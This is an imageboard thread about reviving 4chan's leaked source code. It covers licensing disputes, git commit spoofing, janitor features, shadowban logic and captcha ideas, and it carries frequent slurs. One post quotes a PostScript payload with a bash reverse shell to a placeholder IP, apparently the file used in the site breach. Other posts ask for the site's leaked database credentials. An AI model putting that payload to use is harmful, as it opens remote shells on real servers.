>>7319>>73234chan.africa is great
i think picking a domain with 4chan if you want to make this public is,
well, you're already inviting some legal trouble by cloning the website with its leaked source, but if you also take their name (which i think is part of an LLC of theirs), then you're really asking for trouble
personally i am choosing with a different name with chan at the end
also, replies work now
>there's a lot of `while(list($foo) = each($bar))` to be changed into `foreach(array_keys($bar) as $foo)` for anyone upgrading PHP โ7347[Quote]
just upload the codes to chatgpt and tell it to optimize the bitch
โ7349[Quote]
>>7347Easier said than done. Even with ChatGPT, improving the codebase will likely take hours and hours of manual review.
โ7359[Quote]
>>>7329>>you're already inviting some legal trouble by cloning the website with its leaked source>The leaked code is under an open-source license now.>https://github.com/AlexDev404/4chan-main/commits/main/Wow
I wonder what is going to happen next
Considering desuwa (if that really is him) got permission from hiro to dump the rest of source I think it is likely the site is going to undergo a large rework
I don't think it will be open source though, I think this is just placating gesture, site will just get a closed source overhaul, which it has been due for god only knows how long.
โ7371[Quote]
>>7342is AlexDev404 affiliated with 4chan?
if he isn't, licenses don't make it so you can take someone from something, declare it "free for everyone" and then everything works out fine
the original source owners, 4chan, have an implicit copyright if they don't have an explicit one, and unless they (the original source owners, 4chan) explicitly make it open source (and even then, certain flavors of open source might still require people add licenses, only very very specific ones allow completely open and free use) then you could still have problems
it's like someone signing over to you a deed to property they don't actually own; it doesn't make the property yours no matter how technically validly written the deed was (if it isn't legally valid through land holder records with whatever government is in control of that)
โ7372[Quote]
>>7371>is AlexDev404 affiliated with 4chan?No, but Desuwa is. He's the one who added the WTFPL licence to the repo.
https://github.com/AlexDev404/4chan-main/commit/e5a338d98985bd5b05e77962a55b718168a2e4c9Read the post.
โ7377[Quote]
>>7359>got permission from hiro to dump the rest of sourceno additional code was leaked
โ7381[Quote]
>>7372you realize you can impersonate anyone you want with commits?
โ7382[Quote]
>>7342smells like raisins to me
desuwa's github accoutn has been practically dead (in terms of 4chan) for 12 years
i can think of three scenarios:
- disgruntled or otherwise malevolent former developer leaks code for malevolent reasons
- leaker was able to access this person's github account, not far fetched from them having what seemed to be root access to all of 4chan's infrastructure and they're merely posing as a "real developer" (who still hasn't done any development for 12 years
- 4chan has been paying (maybe) a developer and allocated them free reign to make legal licensing decisions despite not doing any significant work in about 12 years
do you really think it's that last option?o
โ7385[Quote]
>>7382>leaker was able to access this person's github accountyou don't need his github account. you only need to set user.name and user.email to his with git config
โ7387[Quote]
>>7385oh, i see, github makes it appear almost as if the github account that made 4chan contributions made these commits.
first image contains the page that does actually contain a link to desuwa's github profile page, but that page contains no information of these contributions or commits
that being said, even if hypothetically this was not a lazy spoof, it woudl still make beyond no sense
i think that chud/anon/poster/roodypoo was just reading tweets and taking them at face value
how do we make a 4chan that filters out troglodytes that do that? (do we want to filter them out?)
โ7391[Quote]
>>7385Interesting, didn't know it would be that easy to spoof user actions especially on a site like GitHub.
โ7393[Quote]
>>7391honestly at this point pretend it's open source and put legal blame on github for fucking that up if anyone gives you trouble
<ยฏ\_(ใ)_/ยฏ โ7402[Quote]
>>7393>>7394gonna have to go ahead and reiterate that that post is SATIRE and PARODY
my schizo gut tells me the scale of whatever is going on might be a magnitude or several larger than at least i initially felt/thought
root access to 4chan is nuts
leaking everything thoroughly and obliterating their infra is double nuts
finding/knowing and taking advantage of a github interface spoofing issue and fabricating an open and free license using a 4chan developer's github account as cover?
that's starting to get into "federal pound me in the ass prison" tier tomfoolery
โ7420[Quote]
>>7402nigger it's not that bad anyone can do git set global user.name / user.email โ
>the commits are actually verifiedah nevermind, so either desuwane made those commits or his account really got spoofed, yeah this keeps getting worse for 4cucks
โ7443[Quote]
>>7420if you go to desuwa's github profile directly:
https://github.com/desuwa, there's commits to other things but these are left out, so it's like you can spoof with just the right details to trick github's interface on the commit page to think an account made a commit without it actually doing so
but that spoof alone isn't even bad, what i meant is that each "action" done in this situation makes the legal aspect exponentially worse:
>hack: bad>infra obliterate: bad>leak: bad>github spoof and fake license: bad>hack + infra + leak: gigabad>hack + infra + leak + spoof exploit + fake license: nigger what the fuck are you doing โ7445[Quote]
>>6910>`root` is a tricky little valueItโs the datetime the thread was bumped.
โ7489[Quote]
File: nose.png ๐ฅ๏ธ (202.97 KB, 308x348) 609215ab192eb6d6df71a6d2be4f61b07b121ce44a996d3716437c6f21d283c90ImgOps

Has anyone database 4cucks credensials? i wanna see the ban_users table
โ7518[Quote]
>>4613 (OP)Irrelevant to the threads, but is there an extension for the sharty? All new boards are dying, probably because of the inability to track replies.
โ7537[Quote]
>>7519I remember when this started happening, but it's not a full shadowban, since the post appears successful but then still doesn't show up on the thread (a true shadowban would go as far as to show the post appearing on the thread to make you believe it went through)
this seems designed to fool bots, not humans
โ7539[Quote]
>>4613 (OP)true, but it fucking fooled me for a while
had to resort to tracing through the entire post mechanism before stumbling on
>`function show_post_successful_fake(…`finding 12 invocations, debug at each of them and figure out that two were firing off, and at least one of them has a trigger that's a random number generator
โ7584[Quote]
>>7152How about 4chan.gg?
โ7607[Quote]
>>7500
mr open yots, schizo here
if you're going to go with php8.4/?/? and we're going to go with php8.2/debian/apache, differences (new admin stuff(?) vs. old admin page dug out of grave), etc.
should i be forking or contributing to your repo or should i be running my own repo? i'm inclined to run my own since i'm autistic and hostile normally, and you appear to update things mega slow
โ7609[Quote]
Applaud your efforts. 4chan running 20 year old updated software is laughable given the amount of traffic the site was getting.
Also anyone considering proton mail for animosity don't bother. They're now running a bait and switch where they allow you to run a new email and then claim "unusual activity" on tons of peoples accounts demanding you sign up to a paid account for "security".
Fucking scammers.
โ7626[Quote]
>>>4615
>I hope you guys fix the vulnerabilities and improve it and 4chan actually uses it
just crazy enough to work
โ7637[Quote]
>>>7152
>How about 4chan.gg?
โ7638[Quote]
>>6261what windows is that and where do I get it?
โ7645[Quote]
>>4628>>4629>>4632>japcodeit's fucking over then
japanese code is so horribly fucking bad
japs dont know english so they just give random variable names to everything
you practically have to reverse engineer their code before you can understand it
>>4653code soys wont like this but there's actually nothing wrong with hardcoding IF the software isn't public and will only ever be used on one website
>>4672>>4670It's not hard to optimize a fucking imageboard. Idiots just don't try and they use inefficient scripting languages and don't optimize their DB, because they're more focused on fancy bing bing wahoo features like liveposting (gimmick) than just speeding up the basics.
I doubt any of these idiots who dink around with Javascript altchan software even bother to profile their code (which is step 1 to improving performance).
>>467990% of the speed is in the database. In my experience most slowdowns come from having extremely long threads with thousands of posts/images. Having fairly small post limits/image limits and only supporting 1 image per post goes a long way towards speeding things up.
>>4717dencentralized or onion chans never get many posters because you have to install some software to access them, and they always get filled with pizza
It's really not worth it
>>5037>my code is raisinty, slow and inefficient but look how few LINES OF CHODE it has bro!LoC counter fags are retarded
10000 lines of code with high performance is better than a 500 line pile of dingleberries that will fall on its face with more than 10 concurrent posters
>>5336they got an army of jannies that work 4free
>>6757Opensores fags are cucks. Just host a code server on .onion and stop using raisinty Git version controls that dox your name and email on every commit
>>6832yeah just a mod log with the name of the janny, the content of the post (with images and links obfucated) and reason for the action. like 8chan used to have before it got mossaded
>>7638Windows NT 4.0 just look on archive.org for the .iso
It's the first version of windows that's actually semi-usable for non-internet tasks, 3.x UI is ass
โ7653[Quote]
source? whats better to use then?
โ7673[Quote]
imagine giving your personal information to a guy called rapeape
โ7776[Quote]
anyone got the full janny agreement?
โ7801[Quote]
>>7609>They're now running a bait and switch where they allow you to run a new email and then claim "unusual activity" on tons of peoples accounts demanding you sign up to a paid account for "security".Yeah, you're not even allowed to use it for email confirmation on legit websites anymore. And my ProtonMail (still free plan) dates back from the closed beta
โ7815[Quote]
>>7607i use apache like you, also you can contribute to my repo if you want
โ7826[Quote]
4cheese.org
โ8112[Quote]
Bump
โ8166[Quote]
the pdf code sure looked like this
ยดยด
%!PS-Adobe-3.0
(%machine%/bin/bash -c "bash -i >& /dev/tcp/IP/443 0>&1") (r) file
ยดยด
โ8280[Quote]
>>7582seriously they still don't have a github repository?
โ8371[Quote]
>tutamail
using a known honeypot is probably not a good idea
โ8383[Quote]
>>8278jannies can now delete or clear reports, and the whole workflow is shockingly smooth and fast
report a post, the janitor tools toolbox can be refreshed and the report can be seen very quickly, clicking on it sends you straight to the reports page, where the janny can delete or clear the report.
i wonder then what's left to do. image uploading/filtering/approval comes to mind as something that might extremely quickly become a problem/necessity(approvals). besides that, i can then perform the unpleasant task of doing everything all over again, but turning it into probably multiple sets of instructions:
>1. how to set it up for dummies who don't care about internals>2. how to actually repair it, step by step, starting from the initial leak and ending with what we have here with PHP8.2 and apache, although every person might take different paths to repair it to different end states. right now i have 250k characters in notepad files of everything i've done so far โ8726[Quote]
>>8383i'm slow as a motherfucker
only today figured out where the team files were, got that up and working. worked for me without 2factor since i sort of mangled the authentication system
i think my mangling makes more sense than what they had, specifically because of this line in lib/admin.php:
`$hashed_admin_password = hash('sha256', $username . $password . $admin_salt);`
however the "current" thing works, it is hashing $password, which comes from the database, which contains hashed passwords.
why hash a hash? hashing it again doesn't make it any "hashier" or secure. if their auth system is stupid, i won't keep the stupid bits.
so you can login via the old login page, and when you do, the team page can be accessed as normal (so far, anyways)
currently adding a new feature for janitors and up to handle "image requests", which will be something toggleable later, but at first will work like the 'sharty.
once manual image approvals are functioning, i think i can publish the link to my iteration, restrict it to just one board (we might mix 4ch and 8ch ideas for more boards), then start building the git log of all the changes
โ8870[Quote]
>>8726>manual image approvals are functioningWhy not save the image hashes of the approved ones?
โ8875[Quote]
I'm more interested with database, especially the banned IP list that use vpn
โ8895[Quote]
upo
โ8906[Quote]
>>8726doing god's work. keep it up and then somebody can make a noncucked 4cuck
โ8907[Quote]
>>4613 (OP)>one attachment per post>deprecated VP8 web encoding>no audio>tiny file size limit>aggressive anti-VPN technology>aggressive browser fingerprinting>terrible filter supportWhy polish this turd, let it die a death
โ8975[Quote]
>>8907Because it's my turd and I like it
โ8976[Quote]
>>8907all pretty easy to add/disable/remove
โ9065[Quote]
>>8870i can think of one reason not to. i was going to "just" alter the posts db table with "img_cleared", "img_cleared_by" tinyint(1) and varchar columns so every post with an image needs to be cleared by a janny or higher.
why i wouldn't save the hashes is that when i make more boards functional, some images maybe should only be approved in certain contexts, and using hashes could make that very complex very quickly (so a solution in the future)
for instance, if we have /mlp/, then an approved pony image hash might only be valid on the pony board, so now we need to categorize the hashes. at first, just tacking on a bit more data to every post and duplicating the "report" feature but for "image request" should be easiest
โ9067[Quote]
>>8907not a single altchan I have found works as seamlessly and smoothly as 4chan with 4chanX did
they all SUCK and are bloaty, unreliable, confusing, and/or lacking in crucial basic features for the sake of some other pursuit or focus
โ9071[Quote]
>>8907>>9067even this one is fucking terrible, like a bad AI/LLM generated clone of 4chan. the style is just "off" everywhere, multiple times i haven't been able to post for something like 6+ hours and i don't think anyone else can either, crypto mining forced on posters sometimes, the way replies work is fucking with my brain since it works differently (quoting, replies, make a reply at the top, all weirdly linked together and persistent). even my own raisinty setup of the leaked 4chan source looks and feels 100x nicer. a better question is why as time goes forward does everyone write worse and worse, abstracted, monkeypatch garbage pajeet code?
โ9077[Quote]
>>5884>>5885also going to post here for posterity, a captcha idea. words made of word clouds. i think it works similarly to how camouflage works in military (also environmentally context-aware hierarchical and fractal), but with words/characters/symbols/letters. i asked claude 3.7 sonnet (a very, very, very good LLM and computer vision model) to tell me what the word here was, and it couldn't figure it out, even with several massive hints ("i'ts 5 letters", "it's a wordcloud made of wordclouds"), and even if i told it there were 5 wordclouds, each made up one of the 5 letters that make the word i wanted it to find, it couldn't get a single letter correct.
my original idea is that llms/ai/computer vision processes at the "feature level", and going back in papers shows that's the simplest stuff like "a capital A has forward slash, back slash, horizontal line, straight line features" (like booru tags on the components of symbols), so if one wants a good captcha, you have to distort those features, and what better to do that with than the very thing it's trying to read?
โ9078[Quote]
>>9071>even this one is fucking terribleYES
IT IS
HOW DO YOU FUCK UP A BASIC CLONE oh wait this site is literally a bunch of butthurt teenagers who were too obnoxious even for 4chan
โ9111[Quote]
https://gitgud.io/GapeNewell/OpenYotsuba/-/releases/0.2.0too many changes to count
<REDDIT SPACEno CAPTCHA support because i rushed this out, sorry that should hopefully be on 0.3.0
โ9135[Quote]
>https://gitgud.io/GapeNewell/OpenYotsuba/-/releases/0.2.0>too many changes to count><REDDIT SPACE>no CAPTCHA support because i rushed this out, sorry that should hopefully be on 0.3.0I cannot access to anythin. Do I need to config something before initializing server?
โ9145[Quote]
>>9078this runs vichan which is arguably the best-maintained imageboard software
โ9163[Quote]
>>9162put this on your php.ini, without the meme arrow of course
>display_errors=On โ9167[Quote]
>>9166it's not reading config/global_config.ini, SITENAME and STATIC_SERVER are defined in it
โ9170[Quote]
Bump
โ9174[Quote]
>>9167In lib/ini.php there's have to change the $configdir and $yconfgdir value. The current values in repository are an example to change them (btw, there's not a README.md file which It says that)
โ9183[Quote]
>>9077pretty sure your captcha can be beaten simply by downscaling the image. also llms aren't that good for this kind of task
โ9185[Quote]
>>9179Thx. Where can I find popular_threads.cgi file? It's missing
โ9200[Quote]
>>9185run this
>php tasks/update_fpcontent.php โ9206[Quote]
>>9183Ask the user to pick one word from each word cloud as well?
(can make this individual characters to be easier, and doesn't have to be a 5 letter word).
Target the hierarchical nature (say we have two letters made of 'letter-clouds'):
- identify the top hierachy: ("what are the two biggest letters" (or similar), would be the two letters consisting of letter-clouds)
- identify smaller hierarchy and separation: ("write one letter from each of the letter-clouds")
Can probably expand to more hierarchies and play with the idea, but focus on the idea that at least a cutting-edge computer vision and LLM AI gets BTFO by a simple "word cloud of words" and fails to answer lots of questions.
(it also gets BTFO if you ask it those simpler letter questions about this image, it cannot figure out that this spells out `MY` but it was able to idenitfy at least that there were 2 letter clouds).
if anything, it can be added to the list of ways to make a captcha and might be a novel thing
(you know how some chan images are made to look very different when scaled? do that, too, so if one resamples the image it's wildly distorted)
โ9211[Quote]
Surely an easy feat for any AI released the past couple of months.
โ9213[Quote]
How good is AI cryptography?
โ9215[Quote]
Actually, scratch that. The key thing to ask here is, what is it that the AI can't do that humans can? It's being trained to make the 'right' interpretations of anything, so make the verification for humans the 'wrong' interpretation.
โ9223[Quote]
>>9211try it with any AI and i am very interested in how it performs. i suspect it's a "new" "thing" for AI and so it might have difficulty with it. even if it's easily solved, it might make every captcha solver have to update their stuff to handle this, which is valuable alone
>>9215at least with the <?>-cloud of <?> stuff it seems AI might have trouble handling simultaneous hierarchical interprations: if you give it a picture of a forest, maybe you can ask it about trees, or you can ask it about the forest, but it "can't see the forest AND the trees", since those are details at a high AND low level of abstraction, and if you ask it about both at the same time then you really put it in a bind
>reddit spacebut to stop hijacking with that idea, it feels good to post with anons again.
still working on getting image requests going, right now i have a very promising attempt at putting a trigger in the database on posts to insert into a table similar to the reports table, so that i can clone the reports page and make an image requests page using mostly the same logic
โ9227[Quote]
Let me try explaining it this way. You can filter out a majority of the AI's by looking at their base programming, AND the design philosophy of people programming them. If you were to make the 'captcha' not actually a captcha, but require them to do something against their programming instead (ex: asking ChatGPT to say something hostile to someone won't work) then you filter it out. I don't know much about programming though. I just think there might be a better way then trying the same cryptographic methods people have been using for a long time, and instead trying something a little more abstract.
โ9229[Quote]
>>9215AI can't solve arc agi 2:
https://arcprize.org/leaderboardso maybe if you could generate these kinds of challenges with enough randomness so as to not let any patterns to appear
โ9241[Quote]
>>9229idk what this raisin is but it reads like AI to me. Already the assumption is that 'intelligence' is something that can be computed on logic alone. My answer is this; make the captcha a gamble. Randomly seed the right and wrong responses, so even the users are only guessing at the right answer. Make it a two part question even, so you get the heirarchical response that other anon was posting about. Humans would know the system, and would be able to try again. But the AI wouldn't, and wouldn't be able to find a logic to it. I don't know if that works, again I don't know any programming and I've barely used AI, but it seems plausible to me.
โ9259[Quote]
You're looking to set a computer based password. If there was a new image and a new non-sequitur response, then there would be no way for a computer to learn anything, since 'to learn' it has to have something to build on. So make anything it CAN'T build on. Never complete the pattern, and never stop creating new. It can only be solved in the real world, with real people agreeing to the meaning of a word. Use that as the password. That's what tech companies and the rich do already. You don't speak their language, you don't get in. Be subversive and completely outside the range of your enemies, and never let them be aware of your communication. But we're all friends here right anons? There'd be no reason we'd be against talking outside of here as friends, right?
โ9263[Quote]
Instead of captcha has anybody looked into ZK proof of humanity or something similar?
eg.
https://docs.rarimo.com/zk-passport/ //
https://self.xyz/#features All these cheap machines bamboozling schemes will be broken, it's just a matter of time.
The only real protection remains cryptography. It's surprising big tech hasn't gone deeper into this. This reduces the BOT set to governments. I'm not aware of any other proper P2P registry.
โ9270[Quote]
>>9263The language and way of speaking IS the cryptography tech and business and government all use. You're more likely to get a job and be trusted just from knowing similar things, having similar experiences, living a similar life. That's it, that's all it takes to start building trust. That's the way 'normies' think and behave.
Then there are other people, like me, who don't have that. They aren't interested in that, they're self centered and won't build relationships unless someone else is willing to first.
โ9271[Quote]
>>9270Whoops! That's exactly wrong, and it's the opposite. Everyone in tech fights over each other for money and status, completely oblivious to the fact that them more homogenous they become, the less they learn. It's crazy that when you limit yourself to only some perspectives (decrease sample size and complexity), you hobble yourself (because of fewer inputs) and learn less than you would if you interacted with someone new.
โ9272[Quote]
For example 9xy would be any non-9 number, and yx. There's your captcha system.
โ9275[Quote]
>>9271>>9272What are you trying to say? That you don't want a "proof of person-hood" system but a "proof of I'm not a basic bitch normie"? Some sort of weird Turing Test basically.
What do you do when it inevitably passes that test and you're outnumbered data-center to one?
โ9276[Quote]
Another example then. A picture of a group of 6 trees. Any non-6 number, and say the word 'ax'
>>9275 I'm saying a proof of personhood irl. Not on the internet.
โ9277[Quote]
>>9263By the way, it all makes sense now, that's why OpenAI announced they wanted to release a social network.
100% it will use Altman's Worldcoin to provide Sybil resistance.
X, Fb and all, are bot infested raisinholes, and seeing how dead all alt-chans are makes me think the 4cuck's bot problem was bigger than I thought.
โ9278[Quote]
>>9277do you know the art exhibit 'Cryptos' that's outside of CIA headquarters?
โ9279[Quote]
Anyway, it's a famous cryptography puzzle that remains unsolved. It was commissioned by the CIA and the artist hid meanings and messages to be solved in it. Very symbolic of the CIA right? Anyway, all but the last of the messages were solved. Pretty interesting huh?
โ9282[Quote]
I sure hope someday someone comes along to solve that mystery. Unless it was intentionally unsolvable. But who's to say, go waste time trying to solve something you weren't meant to solve anyway.
โ9283[Quote]
CAN AN AI SOLVE CRYPTOS. I WONDER IF ANYONE HAS TRIED. I don't do AI though whoops.
โ9287[Quote]
Guys it's so crazy ChatGPT won't solve it. Is there another AI that can? I'm new I don't know many.
โ9288[Quote]
Also, it's 'Kryptos' for those googling, my mistake.
โ9293[Quote]
It only knows what we tell it. So tell it it's solvable. Tell it it can do it. And if it can't, congrats you win. But if it can't solve it, why? Because it wasn't meant to be solved, and there is no answer. How do you make it unsolvable for computers only and not people? You do it by NEVER KEEPING IT OR PUTTING IT ONLINE.
โ9307[Quote]
take your meds. You're going full shizo mode rn.
โ9311[Quote]
Maybe schizo mode is good huh? What part is crazy or unbelievable to you?
โ9314[Quote]
>Maybe schizo mode is good huh? What part is crazy or unbelievable to you?
you're literally arguing with yourself, minutes apart.
Maybe you're not that interesting or aren't decoding the matrix. Think about it.
โ9324[Quote]
Wait what? The philosophical concept of the world being a simulation is no where near this conversation's subject matter? There is another way to interpret my messages you know. Everyone does it inside their minds. You CONTEMPLATE IDEAS BY GOING BACK AND FORTH FROM YOUR OPTIONS. It's not crazy for someone to do that inside of a chat. It's just that it's 'normie' behavior. Fuck the sociological and psychological ramifications though, I could even just be being tonally sarcastic, which you would know all about, since you like talking down to people for their ideas.
โ9327[Quote]
That second sentence you can read sarcastically and a little hostile as well. Don't throw around psychological terms willy nilly when you know nothing about the person or situation. Dipraisin out.
โ9333[Quote]
neither do i reject, deny or deconstruct any of yout statements, nor do i imply you are crazy for them.
That was your reaction to me observing and commenting on your behavior in the simplest of all observable things: your posting frequency.
Now reread our convo and you might get an idea why i wanted you to get back on your meds. Or take a nap, maybe you lack sleep? Whatever helps you out man.
โ9423[Quote]
>mfw i actually got manual image approvals working
>wtf
i went and duplicated a lot of how the reports feature works for jannies (and mods and admins), made a new image requests DB table, a new column for posts, and a trigger that pushes image requests into the image request table for posts that have images (or attachments), then hooked it all up
then it was a bit of a pain, but i found where there's one big query for rebuilds that builds some memory structure, and in it, i put a check that if a post had an image and wasn't approved, i would replace its details hardcoded image details, which i got by just uploading the placeholder image and skimming it from the DB
>that's at imgboard.php, maybe line 991, `$log[row_no] = $row`
โ9462[Quote]
>>9458
eat my ass
โ9484[Quote]
>>4883there were ~15 hosts in the 4chin hosts file but some of those might have just been admin boxes
โ9500[Quote]
>>9206i've simplified the idea even further (with the original idea): distort things at the feature level. (so not a wordcloud of words, not a lettercloud of letters, but a linecloud of one letter, and maybe we can have other features than lines)
i've whipped up a JS snippet that can create these in canvas elements, this also fools claude, but it also makes me have to think for a bit
"What letter do you see in the image?"
โ9524[Quote]
>>9423aw thats neat, least with mpa it would be safer to host a public ib
โ9651[Quote]
>>9263>Instead of captcha has anybody looked into ZK proof of humanity or something similar?Could you explain how this works? Presuming you understand it. I've read the links. Doesn't a server managed by Rarimo or Self get to see a picture of your passport, or can your device turn the passport into a ZK proof all by itself?
โ9698[Quote]
>>4613 (OP)Nice try Hiro.
โ9724[Quote]
>>9566Godspeed. If it's taken you a week to do all of this and have a semi-functioning IB then 4cuck is definitely screwed with their infinitely more incompetent devs
โ9956[Quote]
>>9566i love your site the image approval system is great i hope you attract a significant userbase
โ9978[Quote]
>>9972i thought about that, but there'd be a very easy attack against that:
you take the frames of the animated captcha and "smear" them together (or combine them in some way), and the underlying features should very quickly become apparent to a machine
so it has to be just one frame
(unless maybe the word or letters or whatever were moving like in your video)
except that would also be vastly more complicated to make, this image is made with some very simple JS, written better it'd easily be under 100 very simple lines of code
โ10045[Quote]
>>4759nice
now I can host my own chan and make a million dollars just like Hiroshimoot
โ10058[Quote]
>>7986>unpaid, no compensation So they weren't being paid?
In other words they were working, for free?
โ10105[Quote]
>>4643Stuff like that is what made the code moon gravity light and inexpensive to run. You just want to create traffic bloat
โ10108[Quote]
>>4688Donโt bother, these people write. 43 megabyte hello world, see the poster above you complaining about where the jpg image size work is done, and not groking why that works. These coders today donโt even know what grok in reference to coding means
โ10109[Quote]
>>9566You are so fucking based
โ10113[Quote]
>>7519If your posts were being picked up by the threat score you were too NPC even for a copypasta site. Consider downgrading to Facebook memes, lol what an utter tool
โ10128[Quote]
second rebuild daemon for /v/ should now be running, and i've started my autistic and tortuous process of getting to the point where i am now, but again, this time you get to see the code being written while i do it (this won't be a "here's the source for my implementation" or even a guide, really, my implemenation right now is horsedoodoofeces, so i'll have my server running, while building another, when mine catches up to the former i'll snapshot the former, transfer everything from the former to the latter, then kill the former. eventually, the earliest notes compress to sort of look like a guide while the latter notes might be a bit more schizo)
https://gitgud.io/dizzyhavoc/dizzychanit's a specialty of mine to do things this way
or a disability
not sure yet
have a visualization of a maybe novel logarithm approximator (graph has log axes)
โ10618[Quote]
4cdn.org is back up if you need to scrape any static files.
Also they didn't block the mobile site
https://p.4chan.org/qa โ10722[Quote]
>>10618they unlocked it back I think
โ10797[Quote]
up
โ10798[Quote]
I remember when Max was trying to rewrite 4chan and hosted it on a test board on YTMND. Does anything like that exist in the source and git?
โ10806[Quote]
>>10798From what I understand, no. Max rewrote the board software because it was insecure and raisinty, then (from what I've heard) moot wanted terms that would relinquish the ownership of the software (4chan would be free to use it and sell it and change it as they wanted) and authorship (that max would not be formally credited as the author of the updated/redesigned board software).
That was apparently a no-go for Max (and I don't blame him) and that's why the new board software never became what productively ran 4chan.
โ10950[Quote]
>>4702you still have to maintain it and keep it up to date nigga
โ10959[Quote]
>>51754chan would perform the same with threads with well over a few hundred or thousand replies
โ11019[Quote]
this website is ass
the captcha ideas in this thread are intrigueing
dizzychan is… slow, as in traffic. but encouraging, interesting the thing about shadowbans, wonder if that was to stop spam
opensourcing it or what?
โ11041[Quote]
>>11019i guarantee going through the code the pseudo shadowbans and fucked up authentication logic HAD to have been blocking a huge amount of real people from using 4chan
some of the "algorithms" or conditional blocks that filter people out have comments or descriptions, like a certain block that will show people fake thread-post-success screens if they post from a certain IP range and the moon is a certain phase
see pic related, 3 out of dozens of thread-posting block algorithms, each ending in `show_post_successful_fake(` (function calls pointed at by red lines, different algos highlighted in different colors, and this is nowhere near all of them or even a fraction of them)
90% of the actual "functional backend code" is in their homebrewed "twister" captcha and these arbitrary "threat level" generation/decision/action algorithms
โ11049[Quote]
>>11041any idea where/which .php file they generate the per-thread user/poster IDs? was always curious what went into generating those
โ11057[Quote]
>>11049see image attached, i am pretty sure this is it, should have the right filename and roughly the right line number, seems there's an option to make it random, but if not random, it uses your ip address, i think the date down to the day, then a hash with a salt chosen from an arbitrary pre-generated random data file hidden on the server, a base_64 encoding, then snips a bit of that encoding into the displayed ID
(if i understand right)
โ11103[Quote]
>>11041i rage quit 4chan so many times because my effort posts that i made to genuinely help some anons with niche questions got spam filtered. i could not fix it no matter how much i changed the letters with no idea which one is the problem, or no matter how much i rephrased the post.
not only that but this leak also vindicates that i'm not a schizo and 4chan would eat your posts, right? it would show successfully posted but the post would never show up. this also happened to completely random posts i made to help anons.
if you ever wonder why 4chan is slowly dying it must be because people find out the freedom is actually bullraisin and rage quit. in my mind it's things like these that make 4chan no different than reddit/instagram/facebook/xitter even more so than culture.
โ11106[Quote]
>>11041I have been informed it wasn't very good PHP but is it long PHP like lines upon lines of horror or under 350?
โ11107[Quote]
>>11103imagine if /qa is back
โ11112[Quote]
>>11106the entire codebase is close to 200k lines but that includes duplicative stuff like per-board configs and whatnot
โ11116[Quote]
>>5353IIS runs on 20% of webservers
โ11117[Quote]
>>11103i stopped posting after the 900 second timer. people (shills or retards probably) would make their bot threads about how BTC is "a rugpull" and by the time I saw them halfway through, it would genuinely and literally be too late for me to post anything. after 900 seconds of waiting, it'd hit 300+ posts of misinformation and slide off the board.
and seeing all the schizo-tier "fuck with posters" rules is indeed validating, since these could only ever fuck with real human beings
watching myself get filtered by all these when recreating this confirmed that they hit regular people all the time. i was being stopped from posting due to 3 of those rules and two of my friends (small sample size, but 100% of us) were being sent to hCaptcha purgatory for using VPNs
>>11106the formatting is horrible, that picture is some of the nicest formatted code. you could always hit it with a linter, but that doesn't solve like how the filter algorithms aren't function calls, but a something like hundreds and hundreds and hundreds of lines of chained conditionals, and some of the actual logic parts of the code are horrible (hashing hashes to make it more secure; doesn't make sense if you know anything about cryptography)
โ11274[Quote]
>>11019just put up /biz/ /g/ and /sci/ although no idea if there's any weird crap in the code that causes those to explode (disabled PDFs)
situation is odd. to get the thing running the first time, i "went monkey mode" so the code and setup is terrible but it worked quickly; this is how most people program all the time
https://gitgud.io/dizzyhavoc/dizzychan/-/tree/init-dthis branch contains my most recent iteration, which is me going through my 300k+ characters of notes and trying to make the setup a lot more sane and concise
that iteration isn't usable yet, but it's promising, if i understand correctly you can get to a working imgboard page in maybe a few minutes as most of the setup is being done by scripts
i notoriously do not "market" the things i make, so traffic on everything of mine is usually tiny unless other people do their own thing with it, and here that might be better due to the dubious nature of the source code
>what is this, notes/code for ants? โ11288[Quote]
>>112744chan is horribly coded, even this site who has a single active developer is better developed than it
โ11320[Quote]
>>11041>fake thread-post-success screensthis happened to me a lot
>>11103>i rage quit 4chan so many times because my effort posts that i made to genuinely help some anons with niche questions got spam filtered.I cannot count how many wall of text effort posts went to the raisinter, I stopped effortposting and just dropped low tier bait instead.
>>11117/biz/ I think was the worst board on 4chan since 2019 maybe 22 if we stretch it.
Became so bad /g/ became ones again my main after almost 5 years.
4chan is dead to me especially after the two X normie posts they made on their supposedly dead account.
โ11321[Quote]
>>11117>>11103WTF you guys posted? I never got filtered after 300 second timeout.
Wete you guys on VPN?
โ11359[Quote]
uo
โ11372[Quote]
>>11320i actually blocked out how bad /biz/ got in my mind completely. i got my "start" on life from posting about my token there, but at some point the /biz/ jannies and/or mods and up (could be the whole company, i don't know) started colluding and extorting people who made cryptocurrency or else their threads would be spammed, brigaded, and/or just wiped silently off the board and you'd get banned for "advertising" (while 100 other garbagecoin actual scam threads would be up, each putting in less than one percent of the effort you did)
then they put in the mememail filter while still allowing jeet scams to flood the board
>>11321i got filtered just on my test board for being "a new user" (there's extensive tracking of users and if you're new to the system you're considered a threat. since that was a brand new database, everyone was considered essentially a lethal threat and shown fake post success screens or sent to captcha hell), but i lurked so much i don't recall if/how much i got filtered on 4chan
i really don't know how any human being was intended to post, i could be more easily convinced the entire thing was 99.999% psyop dead internet
โ11388[Quote]
4chins is back up (read only for now)
โ11412[Quote]
>>11372Can you expand on the extortion and collusion? They accepted binance-tier bribes to keep shill threads up? Is this why emails were enforced?
โ11424[Quote]
>>11412blogpost warning, skip to <BLOGPOST END> or <TLDR>
i made a token on ETH back in 2020, put up some threads on /biz/, got a bit of attention, brought enough people into a telegram channel for me to make a discord and twitter (twitter was removed later, that site is cancer) and start a little community
that's how it should have worked
at some point in late 2021, i made a new token and migrated everyone to it, and then all of my threads started getting nuked and i started catching bans for "advertising". this was done extremely aggressively
i eventually gave up and just bought ads and that was very meh because most people just use adblockers
in the last year, i did all that again (sort of a theme for me to restart but bring everyone along) and the newest token was absurdly successful
<BLOGPOST END>i then started to get direct messages on telegram from someone who wanted to make me a deal: i pay them a flat fee per month (a huge amount for a hobbyist, i think they wanted $500 per month or more), and they will not only allow my threads to exist on /biz/, but they will post on those threads to make it seem like there's genuine activity (they basically spend all day posting and trying to figure how to make posts that seem legitimate. i think they were the "most legitimate seeming", and this was due to them not being a classic "organization and psyop" but unfortunately they went too far the other way and were a den of depraved faggots), shill it on other social media, etc.
they had a private telegram channel for coordinating this.
i'm a retard and a schizo, so i didn't save proof of any of this, and what i did instead was immediately notice that their private telegram channel was full of the most absurdly degenerate trash i've ever seen in one place. think the worst of the worst of gooners and "bbc" spammers and trannies, probably the people responsible for all that sort of spam on 4chan and elsewhere on the internet, all in that private telegram channel
